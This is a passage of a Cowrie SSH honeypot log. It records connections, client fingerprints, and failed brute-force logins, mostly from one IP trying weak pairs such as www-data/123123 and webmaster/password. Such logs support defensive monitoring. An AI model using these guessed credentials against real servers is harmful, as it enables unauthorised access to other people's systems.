llman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:55:59.216253Z","src_ip":"196.251.115.108","session":"ef8b4c0e8626"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"123123","message":"login attempt [www-data/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T23:56:01.339990Z","src_ip":"196.251.115.108","session":"ef8b4c0e8626"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:56:02.521323Z","src_ip":"196.251.115.108","session":"ef8b4c0e8626"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54566,"dst_ip":"1.2.3.4","dst_port":22,"session":"18d6a231c40e","protocol":"ssh","message":"New connection: 217.72.205.35:54566 (1.2.3.4:22) [session: 18d6a231c40e]","sensor":"my-vps","timestamp":"2025-08-24T23:56:16.377535Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:56:16.378859Z","src_ip":"217.72.205.35","session":"18d6a231c40e"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":46628,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd4213c367b4","protocol":"ssh","message":"New connection: 196.251.115.108:46628 (1.2.3.4:22) [session: cd4213c367b4]","sensor":"my-vps","timestamp":"2025-08-24T23:56:45.798110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:56:46.126864Z","src_ip":"196.251.115.108","session":"cd4213c367b4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:56:46.127515Z","src_ip":"196.251.115.108","session":"cd4213c367b4"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"111111","message":"login attempt [www-data/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T23:56:49.546465Z","src_ip":"196.251.115.108","session":"cd4213c367b4"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:56:50.708339Z","src_ip":"196.251.115.108","session":"cd4213c367b4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":49344,"dst_ip":"1.2.3.4","dst_port":22,"session":"056209bdb9af","protocol":"ssh","message":"New connection: 196.251.115.108:49344 (1.2.3.4:22) [session: 056209bdb9af]","sensor":"my-vps","timestamp":"2025-08-24T23:57:34.000443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:57:34.337959Z","src_ip":"196.251.115.108","session":"056209bdb9af"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:57:34.338781Z","src_ip":"196.251.115.108","session":"056209bdb9af"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"1234567","message":"login attempt [www-data/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T23:57:37.763289Z","src_ip":"196.251.115.108","session":"056209bdb9af"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:57:39.029650Z","src_ip":"196.251.115.108","session":"056209bdb9af"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":56386,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4d2f7368d10","protocol":"ssh","message":"New connection: 196.251.115.108:56386 (1.2.3.4:22) [session: e4d2f7368d10]","sensor":"my-vps","timestamp":"2025-08-24T23:58:20.649931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:58:20.938988Z","src_ip":"196.251.115.108","session":"e4d2f7368d10"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:58:20.939696Z","src_ip":"196.251.115.108","session":"e4d2f7368d10"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"123456","message":"login attempt [webmaster/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T23:58:24.566453Z","src_ip":"196.251.115.108","session":"e4d2f7368d10"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:58:25.725547Z","src_ip":"196.251.115.108","session":"e4d2f7368d10"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":60408,"dst_ip":"1.2.3.4","dst_port":22,"session":"434d2242cfd3","protocol":"ssh","message":"New connection: 196.251.115.108:60408 (1.2.3.4:22) [session: 434d2242cfd3]","sensor":"my-vps","timestamp":"2025-08-24T23:59:06.883047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:59:07.264415Z","src_ip":"196.251.115.108","session":"434d2242cfd3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:59:07.265339Z","src_ip":"196.251.115.108","session":"434d2242cfd3"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"password","message":"login attempt [webmaster/password] failed","sensor":"my-vps","timestamp":"2025-08-24T23:59:10.442066Z","src_ip":"196.251.115.108","session":"434d2242cfd3"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:59:11.733810Z","src_ip":"196.251.115.108","session":"434d2242cfd3"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.65.195","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d6404d37ba1","protocol":"ssh","message":"New connection: 68.183.65.195:6100 (1.2.3.4:22) [session: 4d6404d37ba1]","sensor":"my-vps","timestamp":"2025-08-24T23:59:37.256793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-24T23:59:37.268684Z","src_ip":"68.183.65.195","session":"4d6404d37ba1"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-24T23:59:37.281657Z","src_ip":"68.183.65.195","session":"4d6404d37ba1"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-24T23:59:37.990148Z","src_ip":"68.183.65.195","session":"4d6404d37ba1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:59:37.991762Z","src_ip":"68.183.65.195","session":"4d6404d37ba1"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":39738,"dst_ip":"1.2.3.4","dst_port":22,"session":"7415137ee843","protocol":"ssh","message":"New connection: 196.251.115.108:39738 (1.2.3.4:22) [session: 7415137ee843]","sensor":"my-vps","timestamp":"2025-08-24T23:59:54.761876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:59:55.108449Z","src_ip":"196.251.115.108","session":"7415137ee843"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:59:55.109210Z","src_ip":"196.251.115.108","session":"7415137ee843"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"123456789","message":"login attempt [webmaster/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T23:59:58.594899Z","src_ip":"196.251.115.108","session":"7415137ee843"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:59:59.745226Z","src_ip":"196.251.115.108","session":"7415137ee843"}